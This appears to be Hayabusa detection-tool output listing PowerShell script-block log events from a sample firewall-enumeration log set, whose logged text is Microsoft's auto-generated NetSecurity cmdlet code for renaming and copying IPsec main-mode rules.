[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(Pa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object 
$script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFire",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.801 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"wallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject 
(cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 